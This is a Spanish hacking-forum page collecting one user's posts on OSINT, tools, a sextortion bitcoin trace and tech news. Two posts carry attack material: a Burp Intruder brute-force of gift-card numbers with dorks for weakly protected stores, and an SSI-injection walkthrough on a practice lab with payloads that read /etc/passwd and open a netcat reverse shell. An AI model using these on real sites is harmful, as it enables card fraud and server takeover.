Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - HATI

#1



En la actualidad, la cantidad de noticias e información que recibimos sobre diferentes eventos es ingente, lo que facilita la propagación de las tan famosas fake news que venimos escuchando durante estos últimos años.
Con el fin de verificar esta información, existe un conjunto de técnicas que varían en función del tipo de dato a tratar (factchecking). En este post, nos centraremos en la verificación y geolocalización de imágenes (GEOINT / IMINT).
Recomiendo leer la información facilitada al final de este artículo para comprender los posibles usos y técnicas de esta disciplina, ya que, para no aburrir a los lectores, continuaremos con un ejemplo práctico muy sencillo, en el cual se explicará el procedimiento realizado.


Quiztime!
Reverse image search – Google, Yandex, Bing and Tineye

Para este ejemplo utilizaré un reto de @Digit4lbytes en el que se pueden apreciar el uso de diferentes técnicas.
Se trata de averiguar el lugar exacto (coordenadas) en el que se ha tomado la siguiente foto:

Créditos: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Si nunca habéis realizado este tipo de retos, la única información que tenemos es la foto en sí, en la que los metadatos normalmente son inservibles.
Mi primer paso, cada uno puede tener su propia metodología, es realizar una búsqueda de la imagen en los diferentes motores de búsqueda más grandes. A continuación, os dejo un gráfico realizado por No tienes permitido ver los links. Registrarse o Entrar a mi cuenta en el que se comparan las capacidades de los mismos:

Para no tener que realizar la búsqueda manualmente en cada uno de los buscadores, utilizo una extensión open source para navegadores, compatible con Chrome, Firefox y Opera.

Descarga e información: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta[/li][/list]

La búsqueda en Yandex nos arroja una coincidencia en el primer resultado, fácil, ¿verdad?

Si entramos en la web, comprobamos que la imagen es un nodo de Ingress, un juego de rol basado en ubicaciones GPS. Sin embargo, no conseguimos la localización exacta de la imagen, aunque hemos reducido la búsqueda considerablemente, del mundo entero, a Groninga, una ciudad situada en el norte de los Países Bajos.

Tras un rato intentando conseguir un mapa en el que se puediesen visualizar fácilmente los nodos de Ingress (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta), conseguirlo, y ver que no era factible mirar todos los nodos de la ciudad, se me ocurrió realizar otro tipo de búsqueda, centrándome en el otro elemento destacable de la foto, el edificio.

En mi búsqueda manual en Google Maps, me percaté de que la ciudad de Groninga no tiene edificios muy altos, y en el de la foto se puede apreciar que tiene más de 20 plantas. Buscando en Google tallest buildings groningen, obtenemos lo que parece ser una coincidencia.

Para confirmar y verificar la localización de la imagen, buscamos en Google Maps la dirección asociada, y utilizamos la funcionalidad de Google Street View.
Solución: 53.224878, 6.596530

¡Conseguido! Como os dije, a continuación, listaré una serie de blogs, perfiles de twitter, etc, relacionados con esta temática:


Un saludo, HATI
#2
Hace un tiempo desarrollé una herramienta que tuvo buena acogida en la comunidad (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta). Por temas de comodidad, he creado una librería en python que tiene funcionalidades similares, con el fin utilizarlo en diferentes scripts.

URL: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

La librería proporciona una forma sencilla de utilizar la API No tienes permitido ver los links. Registrarse o Entrar a mi cuenta para detectar 467 sistemas de gestión de contenido (CMS) diferentes

Instalación
Código: python
pip install pywhatcms


Uso
First of all, import pywhatcms:
Código: python
from pywhatcms import whatcms


Query a domain:
Código: python
whatcms('API-KEY', 'blog.underc0de.org')


Obtain info:
Código: python

whatcms.name
whatcms.code
whatcms.confidence
whatcms.cms_url
whatcms.version
whatcms.msg
whatcms.id
whatcms.request
whatcms.request_web
#3
Hacking / Sextortion Scam - Follow the money
Diciembre 12, 2018, 05:42:01 AM

Sé que hay algunos artículos sobre este tema, pero no vi a nadie que intentara rastrear el dinero:



Hace unos meses apareció una campaña de phishing un tanto peculiar. La campaña de mensajes de "sextortion", en la que se menciona una contraseña de la víctima y se solicita una cantidad X de dinero a cambio de no publicar contenido sensible de la misma.

Un ejemplo de fragmento de estos correos puede ser el siguiente:

CitarI am well aware shitpassword is your password. Lets get right to the point. You do not know me and you're probably thinking why you're getting this mail? No-one has paid me to investigate about you.

Well, I actually setup a software on the adult streaming (pornographic material) website and you know what, you visited this site to have fun (you know what I mean). When you were viewing videos, your web browser began working as a Remote Desktop that has a key logger which provided me access to your screen and web camera. Just after that, my software gathered your complete contacts from your Messenger, social networks, as well as e-mail . And then I created a video. 1st part shows the video you were watching (you have a good taste ; )), and next part shows the view of your web camera, and its you.

You will have not one but two choices. We will read up on each of these solutions in aspects:

Very first solution is to neglect this email message. In this situation, I am going to send out your very own video to just about all of your contacts and think concerning the awkwardness you can get. And consequently should you be in an important relationship, precisely how it is going to affect?

Next alternative is to give me $5000. Let us name it as a donation. Consequently, I will straight away eliminate your video recording. You could go on your way of life like this never happened and you are never going to hear back again from me.

You'll make the payment through Bitcoin (if you do not know this, search for "how to buy bitcoin" in Google).

BTC Address to send to: 1MkB7HxxxxxqiNAiJUd7DCTEbAyVG9ab2y

[...]

En los correos electrónicos se solicitaba como pago desde $ 1000 hasta $ 7000 en algunas ocasiones, dependiendo de la variante de mensaje recibido:

CitarNumber 2 option would be to pay me $5000. Let us regard it as a donation. In this instance, I will quickly discard your video. You can keep on your way of life like this never occurred and you surely will never hear back again from me.

Citar2nd option is to pay me $1000. We are going to name it as a donation. In such a case, I will straightaway eliminate your video recording. You could go on with your daily ro utine like this never occurred and you will not ever hear back again from me.

CitarOther alternative will be to give me $6000. We will regard it as a donation. Then, I most certainly will straightaway erase your video recording. You will continue on your way of life like this never occurred and you will not ever hear back again from me.

Tenía curiosidad, así que decidí investigar este fraude un poco más a fondo. Recolecté cerca de 1500 correos electrónicos de personas que notificaron que eran víctimas de esta estafa. Para ello recurrí al scrapping de varias web en las que se informa de estos casos. Extraje las direcciones de bitcoin y he comprobé a través de la API de blockchain cuál de ellas ha recibido un pago.

Código: bash
cat address.txt | while read line; do
    received=`curl -s https://blockchain.info/q/getreceivedbyaddress/$line`
    sent=`curl -s https://blockchain.info/q/getsentbyaddress/$line`
    balance=`curl -s https://blockchain.info/q/addressbalance/$line`
    first=`curl -s https://blockchain.info/q/addressfirstseen/$line`
    echo "$line,$balance,$received,$sent,$first" >> sexscamdirecctions.csv
done
echo ""
echo "FINISH"
echo ""


De toda la muestra, alrededor de 325 direcciones han recibido un pago. Esto significa que alrededor del 20% de las víctimas están pagando (en caso de que el patrón de la muestra continúe). Te puedes hacer una idea de la cantidad de dinero que se puede ganar detrás de esta estafa.

Pagos confirmados de 322 direcciones implicadas en la estafa - Maltego CE


En total, las direcciones han recaudado 176.010 dólares. Si seguimos el rastro de las transacciones, podemos ver cómo los fondos terminan en su gran mayoría en la cartera caliente de Binance y en otra dirección aparentemente asociada a Poloniex.



También he detectado algunas direcciones intermedias que han movido mucho dinero, y direcciones finales interesantes como las siguientes:

Seguimiento de las transacciones - Maltego CE

Otra dirección que me llamó la atención por haberla visto antes relacionada con casos de estafas fue la siguiente:


Esta dirección aparece relacionada con casos de fraude, en los siguientes artículos (muy recomendable) se pueden apreciar estos datos:


Aparte de estas direcciones, hay demasiadas direcciones relevantes para contar los detalles de cada una en el post.

Como se puede observar, la cantidad de dinero que se mueve entre estas direcciones es abrumadora. Esto me hace pensar en la posibilidad de que las mismas direcciones se utilicen para mover fondos de otras estafas.

El seguimiento de las transacciones se vuelve bastante complicado, con más de 10.000 direcciones que aparecen en el seguimiento de un solo pago.

Seguimiento de un pago - Maltego CE


En este momento, debido a la falta de recursos y tiempo, creo que es inviable para mí continuar la investigación.

Si alguien quiere colaborar o necesita los datos, podéis contactarme por aquí.

Versión en inglés: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#4

Normalmente, cuando tenia que hacer un barrido de documentos públicos de una empresa para analizar sus metadatos, usaba FOCA. Creo que funciona bastante bien para este propósito, para lo demás...

Recientemente descubrí PowerMeta, un script en Powershell que realiza esta tarea de forma más eficiente. Es más rápido y la cantidad de metadatos puede que obtener de un documento es increíble. El único contra que le veo a diferencia de FOCA, es que solo busca en Google y Bing, aunque suele ser suficiente, a veces suelen indexarse otros documentos en diferentes buscadores.

Lo podéis descargar del siguiente repositorio: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Requisitos:

  • PowerShell versión 3.0 o posterior


Uso:

Lo primero que debemos hacer es importar el módulo:

Código: powershell
C:\> powershell.exe -exec bypass
PS C:\> Import-Module PowerMeta.ps1



- Búsqueda básica:

Código: powershell
PS C:\> Invoke-PowerMeta -TargetDomain targetdomain.com


Por defecto, busca "pdf, docx, xlsx, doc, xls, pptx y ppt".
Una vez que haya terminado de elaborar esta lista, le preguntará al usuario si desea descargar los archivos del dominio de destino. Después de descargar los archivos, se volverá a solicitar la extracción de los metadatos de esos archivos.


- Cambio de FileTypes y descarga y extracción automática:

Código: powershell
PS C:\> Invoke-PowerMeta -TargetDomain targetdomain.com -FileTypes "pdf, xml" -Download -Extract



- Extraer todos los metadatos de archivos en un directorio:

Código: powershell
PS C:\> Invoke-PowerMeta -TargetDomain targetdomain.com -ExtractAllToCsv all-target-metadata.csv


Cuando abrais el archivo csv, vais a ver la cantidad de datos extraidos, que no son pocos.

La herramienta tiene más opciones para realizar búsquedas personalizadas que se ajusten a nuestros requisitos:

Código: powershell

TargetDomain        - The target domain to search for files.
FileTypes           - A comma seperated list of file extensions to search for. By default PowerMeta searches for "pdf, docx, xlsx, doc, xls, pptx, ppt".
OutputList          - A file to output the list of links discovered through web searching to.
OutputDir           - A directory to store all downloaded files in.
TargetFileList      - List of file links to download.
Download            - Instead of being prompted interactively pass this flag to auto-download files found.
Extract             - Instead of being prompted interactively pass this flag to extract metadata from found files pass this flag to auto-extract any metadata.
ExtractAllToCsv     - All metadata (not just the default fields) will be extracted from files to a CSV specified with this flag.
UserAgent           - Change the default User Agent used by PowerMeta.
MaxSearchPages      - The maximum number of pages to search on each search engine.
#5

A la hora de realizar investigaciones en fuentes abiertas, podemos encontrarnos con perfiles que pueden estar asociados a un determinado "nick".

Para obtener más información sobre ese perfil, podemos usar técnicas avanzadas de búsqueda en google, bing y otros metabúscadores, pero en muchas ocasiones los perfiles de los usuarios no se encuentran indexados, lo que nos supone un problema.
Aparte de otros métodos, cuando me encuentro en esa situación suelo revisar siempre la web de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.

Esta web ofrece una API, aunque es de pago. Por este motivo me propuse elaborar una herramienta basada en este servicio que no necesitase utilizar su propia API, además de proporcionarle valor añadido mediante la capacidad de realizar diferentes tipos de búsqueda (en la web esto no se permite).

Las webs soportadas por No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, y por ende, las de la herramienta, son las siguientes:





REPOSITORIO:

Url: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Código: php
git clone https://github.com/HA71/Namechk.git





USO:

- Buscar nombre de usuario disponible:
Código: php
./namechk.sh <username> -au


- Busque nombre de usuario disponible en sitios web específicos:
Código: php
./namechk.sh <username> -au -co


- Buscar lista de nombres de usuario disponibles:
Código: php
./namechk.sh -l -au


- Buscar nombre de usuario utilizado:
Código: php
./namechk.sh <username> -fu


- Buscar nombre de usuario usado en sitios web específicos:
Código: php
./namechk.sh <username> -fu -co


- Buscar lista de nombres de usuario usados:
Código: php
./namechk.sh -l -fu





Un saludo, HATI  ;D
#6

Mucha gente habla de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta o los No tienes permitido ver los links. Registrarse o Entrar a mi cuenta cuando se pretende tener una herramienta de hacking portatil. Estas soluciones requieren tener un módelo de teléfono específico y realizar ciertas configuraciones, aunque ya hay apps que te instalan la versión de Kali NetHunter en cualquier móvil.

Hoy os traigo una solución muy recomendada: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Que mejor explicación sobre Termux que la que dan los propios autores:
Cita de: No tienes permitido ver los links. No tienes permitido ver los links. Registrarse o Entrar a mi cuenta o No tienes permitido ver los links. Registrarse o Entrar a mi cuentaTermux es un emulador de terminal de Android y una aplicación de entorno Linux que funciona directamente sin necesidad de root ni configuración. Se instala automáticamente un sistema base mínimo; hay paquetes adicionales disponibles con el administrador de paquetes APT.

Básicamente nos permite emular una terminal de Linux en nuestro teléfono Android. Lo podeís descargar desde Play Store o F-Droid, os dejo los enlaces:



Características:

  • Soporte de bash y zsh.
  • Editar archivos con nano y vim.
  • Acceder a servidores a través de ssh.
  • Desarrollar en C con clang, make y gdb.
  • Python, Ruby, Perl y Node.js
  • Git y subversión.
  • Ejecuta juegos basados en texto con frotz.


Con la app instalada, lo único que hay que hacer es ejecutarla, y se nos abrirá una sesión en una terminal, podemos abrir más si queremos. Recomiendo instalar No tienes permitido ver los links. Registrarse o Entrar a mi cuenta para un uso más cómodo.

Ahora solo nos queda instalar nuestras herramientas. Nmap viene integrado cómo paquete, por lo que la isntalación es bastante sencilla:
Código: bash
pkg install nmap

O
Código: bash
apt install nmap



Termux ofrece en su wiki una guía de instalación de Metasploit que resumiré a continuación:
Código: bash
cd $HOME
pkg install wget
wget https://Auxilus.github.io/metasploit.sh
bash metasploit.sh


Y para iniciarlo, lo ejecutamos cómo siempre:
Código: bash
./msfconsole




Si quereís añadir más herramientas, el siguiente script en python permite descargar más de 50 diferentes según la tipología de ataque.

LazyMux
Github: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Espero que os guste, es una opcion bastante a tener en cuenta y que puede venir muy bien en determinadas ocasiones.

Un saludo, HATI  ;D
#7
Hacking / GiftCards loves BurpSuite
Abril 02, 2018, 05:35:04 PM



Actualmente, la mayoría de las empresas relacionadas con la venta al consumidor han tenido que transformarse completamente pata adaptar su modelo de negocio a internet, que también ha ofrecido la posibilidad de crear una tienda sin apenas recursos. Esto ha dado lugar a una gran competencia y a numerosas técnicas de captación de clientes, desde promociones hasta nuestras protagonistas las tarjetas regalo o "gift cards".

La intención del post es meramente educativa y no me hago responsable del uso que haga la gente de esta información.


Generalmente, las Gift Cards suelen estar asociadas a una cuenta de usuario, sobre todo las grandes marcas cómo Nike, Apple, Amazon, etc... tienen buenas medidas de protección.
Las páginas web que utilizan este tipo de tarjetas online, permiten comprobar el crédito del que disponen las mismas, y aquí es donde viene el problema. Si la validación de la tarjeta no se hace de forma segura, es posible hacer scraping y comprobar las tarjetas con crédito para su posterior uso.

Las tarjetas regalo se protegen con los siguientes medios en la mayoría de los casos:

  • Cuenta de usuario
  • Pin secundario
  • Captcha
  • Verificación vía e-mail

Ejemplo de Giftcard check


Como he mencionado antes, Internet ha abierto las puertas a cualquier persona que quiera abrir un negocio, lo que supone miles y miles de tiendas online. Alguien que usa un sistema de Gift Cards debe saber los riesgos que supone, pero gracias a los buscadores cómo google podemos hacer una pequeña búsqueda para conseguir lo que queremos:

Una tienda con Gift Cards, que no use cuentas, ni pin secundario, ni captcha, ni verificación mail para comprobar el saldo de la tarjeta, lo que en google se traduce como
Código: php
inurl:giftcardbalance OR inurl:giftcard + "check" -pin -captcha


Es solo un ejemplo, con un poco de imaginación se pueden obtener mejores resultados. Una vez llegados a este paso, podemos comprar un par de tarjetas para ver si siguen algún patron o podemos mejorar nuestro dork para obtener algo más de información:
Código: php
inurl:giftcard + "check" +  "balance"  -pin -captcha + "digits"


Resultados de la búsqueda


También podemos obtener información de las respuestas:

Respuesta de tienda online


Cuando tengamos una web que cumpla los requisitos y sepamos el patron de las tarjetas, debemos crear un diccionario para usarlo en Burpsuite. Podemos hacerlo con el comando No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, No tienes permitido ver los links. Registrarse o Entrar a mi cuentao cualquier otro generador de wordlists.

Configuramos el navegador y obtenemos la petición que comprueba el crédito:

Petición

Y observando la rspuesta, se comprueba que la petición es correcta.



Tras esto lo mandaremos al intruder y configuramos el ataque con el diccionario que hemos creado anteriormente. Unicamente necesitamos introducir un payload, que será el número de tarjeta a comprobar para cada petición, y configurar la captura de datos:

Burpsuite Intruder

Burpsuite Sniper Attack


Como podeis ver, solo ha hecho falta realizar 9 peticiones para obtener una tarjeta de 50$. Sería posible realizar el ataque para comprobar todas las tarjetas con saldo existentes en la web, y en este caso serían muchas, ya que es un sistema intermediario que se dedica a los pagos seguros, ofreciendo el servicio de Gift Cards a muchas webs.

Esto deja en evidencia la seguridad de las compras online en la actualidad. Es conveniente siempre comprar en webs de confianza o con reputación, y no realizar pagos de manera insegura.


Un saludo, HATI  ;)
#8
Hacking / WhatCMS | Detección y explotación de CMS
Marzo 20, 2018, 09:08:08 AM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Introducción

Cita de: WikipediaUn sistema de gestión de contenidos (CMS) es un programa informático que permite crear una estructura de soporte (framework) para la creación y administración de contenidos, principalmente en páginas web, por parte de los administradores, editores, participantes y demás usuarios.

Os dejo una infografía que os aclarará las cosas un poco:

Clic para aumentar


Aunque parezca mentira, se estima que al menos la mitad de las webs activas actualmente utilizan un CMS, y en el 30% de los casos es Wordpress. Este hecho hace que a la hora de realizar auditorías web, en numerosas ocasiones nos encontremos con plataformas de este tipo. Este hecho me motivó a crear la siguiente herramienta para facilitar la tarea de detectar el CMS de una web y buscar herramientas específicas para dicho CMS con el fin de testear su seguridad.


WhatCMS.sh

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta utiliza la API de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y puede detectar más de 330 tipos de CMS diferentes. Una vez detectado, te muestra herramientas de hacking para testearlo ofreciendote la posibilidad de descargarlas automáticamente.

Para usarlo es necesario adquirir la API key desde la siguiente url: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Descarga:

Repo: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Código: php

git clone https://github.com/HA71/WhatCMS.git



Uso:

Código: php


Usage:./whatcms.sh example.com <-wh (opcional)>

-h          Display help message
-wh         Check hosting details
--tools     Display tools information



Nota: la API tiene una restricción de 10 segundos.

Clic para aumentar


Por el momento contiene 44 herramientas de seguridad que abarcan más de 140 CMS. Estoy planeando añadir más, asique si quereis colaborar, podeis hacerlo por aquí dejando la tool que quereis añadir. Aseguraos de que no esté ya en la lista.

Herramientas incluidas:





Un saludo, HATI  ;)
#9

Si os gusta el ASCII art, como a mí, en este post aprenderéis ver todas vuestras imágenes en este formato, con la capacidad de editar algunos parámetros para que quede a nuestro gusto.


INSTALACIÓN:

En primer lugar hay que instalar los prerequisitos:

Código: bash
apt-get install netpbm


Y posteriormente la herramienta:

Código: bash
apt-get install aview



Bastante sencillo, ¿verdad? El uso tampoco tiene mucha complicación.


USO:

Uso básico:

Código: bash
asciiview <imégen>



Para usar los siguientes parámetros, hay que ejecutar el siguiente comando:

Código: bash
asciiview <imégen> -driver linux




  • Incrementar el contraste --- (.)
  • Disminuir el contraste      --- (,)
  • Incrementar el brillo:        --- (>)
  • Disminuir el brillo:             --- (<)
  • Aumentar el Zoom:            --- (Z), (+)
  • Disminuir el Zoom:             --- (z), (-)



Un saludo, HATI  ;)
#10
Dudas y pedidos generales / Tipo de hash
Enero 14, 2018, 04:44:05 PM
Eso mismo. ¿Alguien sabe qué tipo de hash es?

Código: php
1f1767b5696e79116b11ecc7f28827
a6fa1f788eb5c21f03516ec162b022
1e3e7c05f0651868110e46ee623738
23e23065fd93fdb4d71efda8fb3210


No es "Juniper NetScreen/SSG (ScreenOS)"

#11


Imagen que colgó un usuario en la web EcoMotoring News:

Con el Bitcoin cotizando por encima de los 11.000 dólares y subiendo un 30% al mes, es lógico que todo el mundo se vuelva loco minando Bitcoins, que es el término que se usa para ejecutar el algoritmo matemático que te permite conseguir Bitcoins, y después puedes vender o especular con ellos. Al menos, hasta que estalle la burbuja...

Minar criptomonedas da beneficios hoy en día, si superas sus dos grandes barreras: el alto coste del hardware (no vale un simple ordenador), y el alto consumo eléctrico. El dueño de un flamante coche eléctrico Tesla Model S ha ideado una nuevo sistema para reducir gastos: usar la batería eléctrica del Tesla Model S para minar criptomonedas gratis. En Estados Unidos los dueños de coches Tesla pueden recargar la batería gratis en los Supercargadores esparcidos por todo el país.


Un equipo de minado está compuesto por chips especiales y un puñado de potentes tarjetas gráficas trabajando en paralelo, que cuestan miles de euros. Y como el que más potencia aporta más se lleva, o juegas fuerte o pierdes. Al coste del hardware hay que añadir el consumo que conlleva un equipo con docenas de tarjetas gráficas funcionando las 24 horas.

La web Motherboard ha estado analizando la foto para averiguar si es viable minar criptomonedas con un Tesla Model S.

En la imagen se pueden ver cuatro placas base conectadas a la batería, con capacidad para cuatro tarjetas gráficas cada una, asi que se podrían alimentar 16 tarjetas gráficas. No se ven chips ASIC que se usan para minar Bitcoins, así que lo más probable es que mine otra criptomoneda, Ethereum.

Dejando a un lado problemas que parecen irresolubles (16 GPUs calentarían en exceso el interior del coche y no funcionarían sin ventilación, transportar el hardware en el maletero para recargar todos los días en el Supercargador es inviable), supongamos que el sistema de minado funciona.

Según Motherboard, alimentar este minero de criptomonedas durante 24 horas equivale a conducir el Tesla Model S durante 278 kilómetros. Asumiendo que funciona durante las 24 horas del día y que la cotización del Ethereum no baja de los 450 dólares, se pueden ganar unos 675 dólares al mes, que es el coste de adquirir un Tesla Model S mediante leasing... pero a cambio de no conducirlo ni un minuto, pues tendría que minar criptomonedas las 24 horas del día.

¿Te compras un Tesla Model S para no usarlo y ganar 600 dólares al mes? Y eso sin considerar el problema de recargar la batería... No parece un sistema de minado demasiado práctico, aunque sí muy original.


Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#12

Si os gusta usar la línea de comandos, y os gusta la NBA, no te puedes perder esta herramienta. Con No tienes permitido ver los links. Registrarse o Entrar a mi cuenta puedes ver los datos de partidos en vivo, estadísticas de equipos, información sobre jugadores, etc, y todo desde la terminal. La información la obtiene de la web oficial de la NBA No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, por lo que todos los datos son fiables.

Para que funcione correctamente, hay que asegurarse de que tenemos instalado Nodejs y NPM, si no los tenemos, podemos descargarlos e instalarlos fácilmente con los siguientes comandos:

  • Descargar e instalar NODEjs
    Código: bash
        git clone git://github.com/nodejs/node.git

        cd node

        make install

        cd ..

  • Descargar e instalar NPM
    Código: bash

        git clone git://github.com/npm/npm.git

        cd npm

        make install

        cd ../

    Una vez tengamos los prerequisitos, hay que clonar su repositorio de Github:

    Código: bash
    git clone https://github.com/xxhomey19/nba-go.git


    Y para instalar, basta con el siguiente comando:

    Código: bash
    npm install -g nba-go






    Su uso es bastante sencillo, podemos elegir entre estadísticas de partidos o estadísticas de jugadores. El comando básico es sería el siguiente:

    Código: bash
    nba-go game



    Código: bash
    nba-go player <jugador>




    Ofrece mucha más flexibilidad a la hora de mostra datos, podéis filtrar por fecha, finales, equipos... si queréis aprender más sobre esta tool, os dejo la guía oficial:

    NBA-Go: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


    Un saludo, HATI
    #13
    Galería / Nueva firma
    Noviembre 27, 2017, 08:33:25 AM
    Nueva firma:



    Si algún usuario quiere una firma personalizada puedo intentar sacarle algo de tiempo.

    Usuarios con al menos 2 puntos de reputación y más de 50 post.
    #14
    Hacking / Explotando SSI Injection desde 0
    Noviembre 25, 2017, 03:40:56 PM


    Introducción
    -------------------------------------------------------

    Estos días he estado testeando una aplicación web de un cliente y me he encontrado con una vulnerabilidad que desconocía (seguro que para muchos será conocida). Se trata de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, y para saber bien de que se trata, primero hay que conocer que es una No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.

    Cita de: Traducción - OWASP SSILas SSI son directivas presentes en las aplicaciones Web utilizadas para alimentar una página HTML con contenido dinámico. Son similares a los CGIs, excepto que los SSIs se utilizan para ejecutar algunas acciones antes de que se cargue la página actual o mientras se visualiza la página. Para ello, el servidor web analiza SSI antes de suministrar la página al usuario.

    Las implementaciones comunes de SSI proporcionan comandos para incluir archivos externos, para establecer e imprimir variables de entorno CGI del servidor web, y para ejecutar scripts CGI externos o comandos de sistema.

    Vamos a profundizar un poco y ver que se puede hacer con una directiva SSI, para comprender porqué es muy peligroso realizar una mala configuración de estas:



    • La sintáxis es la siguiente:
      Código: asp
      <!--#function attribute=value attribute=value ... -->




    • Se pueden usar variables de entorno, por ejemplo, para obtener la hora:
      Código: asp
      <!--#echo var="DATE_LOCAL" --> 




    • También se pueden incluir ficheros:
      Código: asp
      <!--#include virtual="/footer.html" --> 




    • O incluso, y peligroso, ejecutar comandos:
      Código: asp
      <pre>
      <!--#exec cmd="dir" -->
      </pre>



    • Es posible declarar variables y usar expresiones condicionales:
      Código: asp
      <!--#set var="modified" value="$LAST_MODIFIED" -->


      Good <!--#if expr="%{TIME_HOUR} <12" -->
      morning!
      <!--#else -->
      afternoon!
      <!--#endif -->



      Los servidores más conocidos que soportan este tipo de directivas son Apache, Nginx, ISS, Lighthttpd y LiteSpeed, y generalmente se encuentran en archivos con extensión ".shtml", ".stm" o ".shtm", aunque no siempre es así.

      Por lo tanto, la vulnerabilidad es básicamente una inyección de código que explota directivas SSI, y que, dependiendo de la configuración del servidor, puede conllevar, entre otros casos, a la ejecución de código arbitrario en el server, inclusión de archivos, ejecución de código javascript...

      Fuetntes y más información:

      - No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
      - No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
      - No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
      - No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


      Una vez explicado esto, podemos ir a la acción  8)



      PoC
      ---------------------------------

      Para buscar aplicaciones vulnerables, podemos usar dorks, os dejo algunos de ejemplo, aunque se pueden crear más elaborados:


        - inurl:bin/Cklb/
        - inurl:login.shtml
        - inurl:login.shtm
        - inurl:login.stm
        - inurl:search.shtml
        - inurl:search.shtm
        - inurl:search.stm
        - inurl:forgot.shtml
        - inurl:forgot.shtm
        - inurl:forgot.stm
        - inurl:register.shtml
        - inurl:register.shtm
        - inurl:register.stm
        - inurl:login.shtml?page=

      Por suerte, el entorno de pruebas No tienes permitido ver los links. Registrarse o Entrar a mi cuenta nos permite testear este tipo de ataques sin hacer daño a nadie.  ;D

      Para montar el lab, solo es necesario subir el contenido de bWAPP a un servidor con PHP y base de datos, podeís usar No tienes permitido ver los links. Registrarse o Entrar a mi cuentao similar para hacer esto. Os dejo una guía por si alguien quiere detalles de la instalación:


      Una vez tengamos todo el lab montado, hay que configurar un proxy para interceptar las peticiones, yo usaré No tienes permitido ver los links. Registrarse o Entrar a mi cuenta. Seleccionamos la opción correspondiente a SSI Injection y ya tenemos todo listo para comenzar.



      En el supuesto de un escenario real, lo primero que debemos hacer para testear la vulnerabilidad sería validar los parámetros de entrada. Haciendo una petición con los caracteres que debe filtrar una directiva SSI lo comprobamos.

      Caracteres: < ! # = / . " - > and [a-zA-Z0-9]

      Petición

      Respuesta


      Se puede ver claramente que noha filtrado nada, ya que nos devuelve los valores introducidos.

      A continuación, probemos con una variable de entorno para ver el resultado:

      Variable de entorno: <!--#echo var="DATE_LOCAL" -->

      Petición

      Respuesta

      La variable introducida contiene el valor de la fecha del sistema del servidor, lo que significa que podemos interactuar con él. Vamos a comprobar si tenemos acceso a datos sensibles cómo pueden ser los directorios /etc/passwd o /etc/shadow.

      Directivas enviadas:

      • <!--#exec cmd="whoami"-->
      • <!--#exec cmd="cat /etc/passwd"-->

      Respuesta

      Por último, veamos cómo obtener una shell para tener total control del servidor. Para ello, tenemos que abrir una conexión con netcat, para luego enviar una directiva que indique al server la conexión.


      Comando netcat:

      [/list]
      Código: bash
      nc -nlvp -p 1337


      Directiva: <!--#exec cmd="nc No tienes permitido ver los links. Registrarse o Entrar a mi cuenta 1337 -e /bin/bash"-->

      Shell:


      Espero que os haya gustado. Un saludo, HATI
      #15

      La semana pasada se hablaba de que se iba a lanzar antes de Navidad un jailbreak para para PS3 que iba a permitir piratear una gran cantidad de consolas que tuviesen un firmware oficial 4.82 o anterior mediante la instalación de un Custom Firmware (CFW). Dicho y hecho, ahora ya está disponible la primera versión que puede instalarse desde el OFW 4.82 para poder ejecutar modificaciones y copias de juegos.


      PS3Xploit: el pirateo vuelve a PS3

      Hasta ahora era necesario comprar un Hardware Flasher como un E3 Flasher para hacer downgrade al firmware 3.55 (modelos de consola 25xx o anterior. Sin embargo, con con PS3Xploit se puede realizar todo el proceso a través de software sin tener que abrir la consola, y en tan sólo unos pocos minutos.

      Lo que hace este proceso es, básicamente, parchear el CoreOS del chip NOR o NAND. Una vez instalado, cuando reiniciemos la consola podemos instalar el Custom Firmware, pasando directamente de un firmware oficial a uno personalizado. El proceso ha de realizarse desde el firmware oficial 4.82, ya que se flashea a una versión modificada de ese mismo 4.82.

      Entre los modelos soportados encontramos todos los modelos de la PS3 Fat y los modelos de la Slim hasta 25xx que vinieran de serie con el firmware 3.56 o anterior. Los modelos SuperSlim y los modelos Slim 3xxx, 4xxx no son compatibles. Los modelos 2xxx que vinieran de serie con firmware 3.60 o superior tampoco son compatibles (consolas vendidas después de diciembre de 2010 más o menos). Según afirman sus creadores, las consolas Slim y SuperSlim que actualmente no son compatibles podrían serlo en los próximos meses.


      PS3Xploit permite ejecutar copias de juegos

      Con PS3Xploit y el CFW 4.82 instalado, los usuarios pueden realizar todo tipo de modificaciones en su consola. Por ejemplo, pueden ejecutar emuladores o copias de sus juegos. Si tienes una PlayStation 3 con el lector de discos roto, puedes copiar tus juegos a un disco duro o SSD externo para jugarlos.

      Las instrucciones de instalación se encuentran en No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, o también tenéis una No tienes permitido ver los links. Registrarse o Entrar a mi cuenta. Si lo hacéis corréis el riesgo de poder estropear vuestra consola. Además, si os conectáis a PSN incurrís en el riesgo de que os baneen la consola y vuestra cuenta, por lo que es conveniente que no os conectéis si lo instaláis.


      Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
      #16


